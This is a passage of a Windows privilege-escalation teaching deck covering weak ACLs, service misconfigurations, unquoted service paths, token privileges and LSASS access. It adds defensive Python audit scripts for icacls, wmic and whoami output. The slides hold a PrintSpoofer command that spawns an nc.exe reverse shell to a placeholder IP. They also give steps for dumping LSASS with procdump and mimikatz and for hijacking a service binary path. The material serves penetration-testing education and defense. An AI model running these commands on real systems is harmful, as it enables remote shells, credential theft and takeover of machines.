experience in Cybersecurity
• Specializing in Application Security and Network Penetration Testing
• Actively exploring and researching LLM Security and emerging AI threats
Outside the Terminal
• Boxing
• Chess
• Anime
process an attacker (or pentester) uses to gain higher privileges on a Windows system than the ones they currently hold — typically moving from a low-privileged user (standard user) to local Administrator or SYSTEM. It’s a core post-compromise step that enables persistence, credential access, and full control.
such as databases, configuration files, or stored secrets.
• To enable further lateral movement within the client network by leveraging obtained credentials or escalated privileges.
can read, write, execute, or modify files and directories.
• Permissive ACLs grant excessive access (e.g., Everyone: Full Control) to sensitive resources.
Examples:
• Services with binaries or directories writable by Authenticated Users
• Startup items or scheduled tasks pointing to user-controlled paths
• Application folders with world-writable permissions
• Backup or log folders granting write/delete access to low-priv users
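The following is an added defender-side check, not part of the original slides: it parses the ACL listing that `icacls` prints for a directory and reports every entry that gives a low-privilege principal (Everyone, BUILTIN\Users, Authenticated Users, INTERACTIVE) a write-class right, which is exactly the "world-writable application folder" condition listed above. The directory path, the ACEs and the principal set are constructed for the example; on a real host you would feed it the output of `icacls "<path>"`.

```python
import re
from typing import List, Tuple

# Principals that any interactive or authenticated low-privilege user falls under
# (compared case-insensitively). Extend for site-specific groups.
LOW_PRIV_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}

# icacls rights that let a principal change or replace content: simple rights
# F (full), M (modify), W (write), D (delete) plus the specific rights that imply
# writing or re-ACLing (WD/AD write data or add file, WA/WEA write attributes,
# DC delete child, WDAC write DAC, WO write owner).
WRITE_RIGHTS = {"F", "M", "W", "D", "DC", "WD", "AD", "WA", "WEA", "WDAC", "WO"}

# Constructed sample in the shape icacls prints for a single directory:
# the first line carries the path followed by the first ACE, later ACEs are
# indented. Path and ACEs are hypothetical and not taken from a real host.
AUDITED_PATH = r"C:\Program Files (x86)\PCProtect"
SAMPLE_ICACLS_OUTPUT = r"""
C:\Program Files (x86)\PCProtect NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                 BUILTIN\Administrators:(I)(OI)(CI)(F)
                                 NT AUTHORITY\Authenticated Users:(OI)(CI)(M)
                                 BUILTIN\Users:(I)(OI)(CI)(RX)
                                 Everyone:(OI)(CI)(RX,W)

Successfully processed 1 files; Failed processing 0 files
"""


def parse_icacls(output: str, path: str) -> List[Tuple[str, List[str]]]:
    """Return (principal, [flag groups]) for every ACE in icacls output for `path`.

    Flag groups are the parenthesised tokens exactly as printed, e.g.
    ["I", "OI", "CI", "RX,W"]; inheritance flags and rights are separated later.
    """
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        # The first ACE shares its line with the audited path; strip the path
        # we asked about rather than guessing where a principal name begins.
        if line.startswith(path):
            line = line[len(path):].strip()
        sep = line.find(":(")
        if sep == -1:
            continue  # not an ACE line (e.g. a warning)
        principal = line[:sep]
        flags = re.findall(r"\(([^)]*)\)", line[sep + 1:])
        aces.append((principal, flags))
    return aces


def weak_aces(aces: List[Tuple[str, List[str]]]) -> List[Tuple[str, List[str], bool]]:
    """Return (principal, sorted write rights, inherited) for every ACE that gives a
    low-privilege principal write-class access. `inherited` is True when the ACE
    carries (I), which means the fix belongs on the parent directory."""
    findings = []
    for principal, flags in aces:
        if principal.lower() not in LOW_PRIV_PRINCIPALS:
            continue
        tokens = {token.strip() for group in flags for token in group.split(",")}
        hits = sorted(tokens & WRITE_RIGHTS)
        if hits:
            findings.append((principal, hits, "I" in tokens))
    return findings


def audit_directory(output: str, path: str) -> List[Tuple[str, List[str], bool]]:
    """Parse icacls output for `path` and report the weak ACEs."""
    return weak_aces(parse_icacls(output, path))


if __name__ == "__main__":
    for principal, rights, inherited in audit_directory(SAMPLE_ICACLS_OUTPUT, AUDITED_PATH):
        origin = "inherited from parent" if inherited else "explicit on this object"
        print(f"{AUDITED_PATH}: {principal} has {','.join(rights)} ({origin})")
```

On the constructed sample the audit flags Authenticated Users (M) and Everyone (W); the inherited flag tells you whether to fix the object itself or the parent it inherits from, and `icacls "<path>" /remove:g "<principal>"` is the usual remediation once the grant is confirmed unnecessary.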
.\SharpUp.exe audit

=== Modifiable Service Binaries ===

Name        : SecurityService
DisplayName : PC Security Management Service
Description : Responsible for managing PC security
State       : Stopped
StartMode   : Auto
PathName    : "C:\Program Files (x86)\PCProtect\SecurityService.exe"
Service Control Manager (SCM) and have associated security descriptors (permissions).
• Weak service permissions allow unauthorized users to modify, reconfigure, or control services they shouldn't.
Security Risk
• Attackers can abuse weak permissions to:
  ⚬ Change the service binary path → point to a malicious executable.
  ⚬ Start/stop the service to execute code as SYSTEM.
  ⚬ Modify service configuration, leading to persistence or privilege escalation.
• Exploiting services that run as NT AUTHORITY\SYSTEM can grant full control of the machine.
/accepteula -quvcw <service name>
Step 3: Modify the service binary path to execute a command (e.g., add a user to the local Administrators group).
Step 4: Stop and start the service.
ImagePath points to the binary to run. If that path contains spaces but is not enclosed in quotes, the Windows service loader may search for an executable in path segments — creating a local escalation/persistence vector if earlier path locations are writable by low-privilege users.
Service Binary Path (example, weak permissions):
C:\Program Files\Acme App\Service\acme_service.exe
Windows will try to load the executable from the path as follows:
• C:\Program
• C:\Program Files
• C:\Program Files\Acme
• C:\Program Files\Acme App\Service\acme_service
C:\Program.exe (or an earlier writable path in the chain), that program could be executed by the service (which often runs as SYSTEM), resulting in privilege escalation.
Step 1: Enumerating Services
• wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
GVFS.Service             GVFS.Service                C:\Program Files\GVFS\GVFS.Service.exe                                       Auto
System Explorer Service  SystemExplorerHelpService   C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe   Auto
WindscribeService        WindscribeService           C:\Program Files (x86)\Windscribe\WindscribeService.exe                      Auto
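As an added audit example (not code from the slides), the script below does in code what the two slides above describe: it expands an unquoted ImagePath into the candidate executables the loader tries, following the documented CreateProcess rule (split at each space, append .exe to each prefix, then try the full string), lists the directories whose write permissions therefore have to be verified, and builds the `sc config ... binPath=` command that re-registers the service with a quoted path. The input is a constructed sample in the shape of `wmic service get name,pathname,startmode /format:csv`; the service names are modelled on the enumeration output above but the rows are hypothetical.

```python
import ntpath
from typing import Dict, List

# Constructed sample in the shape of
#   wmic service get name,pathname,startmode /format:csv
# (a Node column first, fields unquoted). Hosts, names and paths are
# hypothetical, modelled on the enumeration output shown above.
SAMPLE_WMIC_CSV = r"""
Node,Name,PathName,StartMode
HOST1,GVFS.Service,C:\Program Files\GVFS\GVFS.Service.exe,Auto
HOST1,WindscribeService,C:\Program Files (x86)\Windscribe\WindscribeService.exe,Auto
HOST1,AcmeAgent,"C:\Program Files\Acme App\agent.exe" --service,Auto
HOST1,Spooler,C:\Windows\System32\spoolsv.exe,Auto
HOST1,PlainSvc,C:\Tools\plainsvc.exe,Auto
HOST1,LegacyTool,C:\Program Files\Legacy Tool\legacy.exe,Manual
"""


def exe_search_candidates(image_path: str) -> List[str]:
    r"""Executables the loader tries, in order, for an unquoted ImagePath.

    Implements the documented CreateProcess rule: the string is split at each
    space and every prefix (with .exe appended when it has no extension) is
    tried before the full string. The slide's example
    C:\Program Files\Acme App\Service\acme_service.exe therefore yields
    C:\Program.exe, C:\Program Files\Acme.exe and finally the real binary.
    """
    tokens = image_path.split(" ")
    candidates = []
    for i in range(1, len(tokens)):
        prefix = " ".join(tokens[:i])
        if not ntpath.splitext(prefix)[1]:
            prefix += ".exe"
        candidates.append(prefix)
    candidates.append(image_path)
    return candidates


def directories_to_check(candidates: List[str]) -> List[str]:
    """Directories a low-privilege user must NOT be able to write to, in order;
    the last entry is the binary's own folder."""
    dirs: List[str] = []
    for candidate in candidates:
        parent = ntpath.dirname(candidate)
        if parent not in dirs:
            dirs.append(parent)
    return dirs


def audit_unquoted_service_paths(wmic_csv: str, auto_only: bool = True) -> Dict[str, List[str]]:
    r"""Map service name -> loader candidates for every unquoted ImagePath with spaces.

    Mirrors the filters of the wmic|findstr one-liner above: auto-start only,
    skip C:\Windows, skip paths already in quotes. Fields are split by hand
    because wmic's CSV writer does not quote, so csv.reader would mangle an
    ImagePath that itself starts with a double quote.
    """
    findings: Dict[str, List[str]] = {}
    lines = [ln.strip() for ln in wmic_csv.splitlines() if ln.strip()]
    for line in lines[1:]:  # skip the Node,Name,PathName,StartMode header
        parts = line.split(",")
        if len(parts) < 4:
            continue
        name, start_mode = parts[1], parts[-1]
        path = ",".join(parts[2:-1]).strip()  # a path may legitimately contain commas
        if auto_only and start_mode.lower() != "auto":
            continue
        if path.startswith('"') or " " not in path:
            continue  # quoted, or no spaces: the loader takes it verbatim
        if path.lower().startswith("c:\\windows\\"):
            continue
        findings[name] = exe_search_candidates(path)
    return findings


def remediation_command(name: str, path: str) -> str:
    """The sc.exe command that re-registers the service with a quoted binary path
    (for an ImagePath with no trailing arguments)."""
    return f'sc config {name} binPath= "\\"{path}\\""'


if __name__ == "__main__":
    for svc, cands in audit_unquoted_service_paths(SAMPLE_WMIC_CSV).items():
        print(f"[!] {svc}: unquoted path, loader tries {cands}")
        print(f"    verify no low-privilege write access in: {directories_to_check(cands)}")
        print(f"    fix: {remediation_command(svc, cands[-1])}")
```

The candidate list is what a defender checks with `icacls` on each parent directory; most findings on a default install resolve to directories such as C:\ and C:\Program Files, whose default ACLs do not allow standard users to create files, so the real exposure is usually the vendor's own folder.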
drivers that allow attackers to execute code or corrupt kernel state, bypassing user-mode protections.
• Full system control — kernel-level access gives attackers complete control of the host.
• Bypasses protections — file ACLs, UAC and other user permissions become ineffective.
• Persistent compromise — enables rootkits or kernel implants that survive reboots and are hard to remove.
(universities, hospitals, utilities, government).
Upgrading alone does not eliminate all risk — vulnerable apps, misconfigurations, and user behavior persist across versions.
Microsoft stops issuing security updates for versions outside supported and extended support windows. Most EOL systems receive no public security patches.
• Lack of vendor support: Applications (browsers, agents, tools) may stop working or receive no updates.
• Hardware compatibility issues: New hardware may lack drivers or support on legacy OS builds.
• Unpatched security flaws: No more security updates → exposure to remote code execution, privilege escalation, and historic “wormable” vulnerabilities.
OS-level capabilities assigned to accounts or groups that control sensitive actions (for example: creating tokens, debugging processes, loading drivers, or backing up files). They are separate from file/registry ACLs and group membership. These are enforced by the Local Security Authority (LSA) through the user’s access token.
• SeAssignPrimaryToken
• SeBackup
Reference: https://github.com/gtworek/Priv2Admin
Windows are data structures that describe the security context of a process or thread:
1. Who you are (user SID)
2. What groups you belong to
3. What privileges you have (SeDebug, SeImpersonate, etc.)
Every process in Windows runs with a token assigned when it's created. Tokens are key to authorization decisions by the OS.
and the system allows impersonation scenarios (e.g., services with named pipes), this is a golden path to SYSTEM.
Key scenario: If your user has SeImpersonatePrivilege, you can impersonate higher-privileged users if a service exposes a token. Many services allow named pipe connections where you can trick them into authenticating and capture an impersonation token.
Technique:
• Fake service → make SYSTEM connect → impersonate SYSTEM
• Common in Juicy Potato, Rogue Potato, etc.
10 (build 1809 and later) and Windows Server 2019.
• Check privileges: whoami /priv → look for SeImpersonatePrivilege: Enabled
• Run PrintSpoofer: PrintSpoofer.exe -c "c:\tools\nc.exe <ip> <port> -e cmd"
• Result: SYSTEM shell
and control processes system-wide.
• Bypasses normal ownership checks so a holder can operate on any process.
High-privilege targets: Processes like lsass.exe contain secrets (passwords, tokens).
Technique:
• Dump the LSASS process using Procdump
• Transfer the dump file and extract credentials from it using mimikatz.
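The privilege slides above (privileges and tokens, SeImpersonate, SeDebug) all start from the same triage step, `whoami /priv`. The added example below (not from the slides) parses that output and reports which of the privileges the deck names are held by the token, together with the risk and the usual hardening step a defender would apply. The `whoami /priv` text is a constructed sample with the real column layout, and the risk/mitigation notes are this example's own summary rather than an official catalogue; the Priv2Admin reference cited above has the complete list.

```python
from typing import Dict, List, Tuple

# Privileges the slides single out, with why a defender cares and the usual
# hardening step (this example's summary, not an official reference).
HIGH_RISK_PRIVILEGES: Dict[str, Tuple[str, str]] = {
    "SeImpersonatePrivilege": (
        "token impersonation (Potato-family / PrintSpoofer escalation to SYSTEM)",
        "grant only to service accounts that need it; prefer virtual or managed service accounts",
    ),
    "SeAssignPrimaryTokenPrivilege": (
        "lets a process start others under an arbitrary primary token",
        "review service accounts holding it; treat it like SeImpersonate",
    ),
    "SeDebugPrivilege": (
        "access to any process memory, including lsass.exe",
        "restrict to administrators; enable LSA protection (RunAsPPL) and Credential Guard",
    ),
    "SeBackupPrivilege": (
        "reads any file regardless of ACL (registry hives, secrets)",
        "keep to Backup Operators; audit group membership",
    ),
    "SeLoadDriverPrivilege": (
        "loads kernel drivers, including vulnerable signed ones",
        "restrict to administrators; apply the vulnerable driver blocklist",
    ),
    "SeCreateTokenPrivilege": (
        "creates arbitrary access tokens",
        "should not be held by any interactive account",
    ),
}

# Constructed sample in the layout of `whoami /priv` (not captured from a real host).
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""


def parse_whoami_priv(text: str) -> Dict[str, str]:
    """Map privilege name -> state ('Enabled'/'Disabled') from `whoami /priv` output."""
    privs: Dict[str, str] = {}
    for raw in text.splitlines():
        parts = raw.split()
        # Data rows start with the privilege constant and end with its state;
        # the description in between may contain any number of spaces.
        if len(parts) >= 2 and parts[0].startswith("Se") and parts[-1] in ("Enabled", "Disabled"):
            privs[parts[0]] = parts[-1]
    return privs


def triage_privileges(privs: Dict[str, str]) -> List[Dict[str, str]]:
    """Report every high-risk privilege present in the token, enabled or not.

    A privilege shown as Disabled is still held: the process can turn it on
    with AdjustTokenPrivileges at any time, so presence is what matters, not
    only the 'Enabled' state the slide tells you to look for.
    """
    report = []
    for name in sorted(privs):
        if name in HIGH_RISK_PRIVILEGES:
            risk, mitigation = HIGH_RISK_PRIVILEGES[name]
            report.append({"privilege": name, "state": privs[name], "risk": risk, "mitigation": mitigation})
    return report


if __name__ == "__main__":
    for finding in triage_privileges(parse_whoami_priv(SAMPLE_WHOAMI_PRIV)):
        print(f"[!] {finding['privilege']} ({finding['state']}): {finding['risk']}")
        print(f"    mitigation: {finding['mitigation']}")
```

On the sample token the triage reports SeAssignPrimaryTokenPrivilege (held but disabled) and SeImpersonatePrivilege (enabled), which is the combination typically seen on IIS and database service accounts and the reason those accounts deserve the hardening listed for them.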